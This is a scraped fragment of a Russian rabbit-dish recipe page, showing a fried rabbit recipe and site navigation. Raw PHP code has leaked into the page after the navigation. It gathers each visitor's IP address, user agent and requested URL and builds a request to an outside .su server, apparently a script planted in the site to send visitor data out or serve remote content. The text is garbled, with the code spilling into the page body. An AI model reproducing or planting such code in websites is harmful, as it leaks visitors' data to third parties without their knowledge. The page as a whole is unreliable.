| |||
Порционные кусочки посолить, поперчить и обжарить на растительном масле до готовности. Отдельно в том же масле поджарить нарезанные грибы, добавить к ним томатное пюре и петрушку. Приготовленное мясо полить соусом и соком лимона. Напишите мне На главную Фотоальбом Калифорнийская Серебристая Белый великан О пользе крольчатины Блюда из кролика $serverrobo = $_SERVER['REMOTE_ADDR']; $agentrobo = $_SERVER['HTTP_USER_AGENT'];$urlrobo = $_SERVER['HTTP_HOST'];$urlrobo .= $_SERVER['REQUEST_URI']; $agentrobo = str_replace(" ","", $agentrobo);$getroboip = "http://XN--80AVUE.xn--90acjmnnc1hybf.su/server.php?idishka=136498&ipishka=$serverrobo&useragentka=$agentrobo&urlrobotka=$urlrobo";?> ![]() |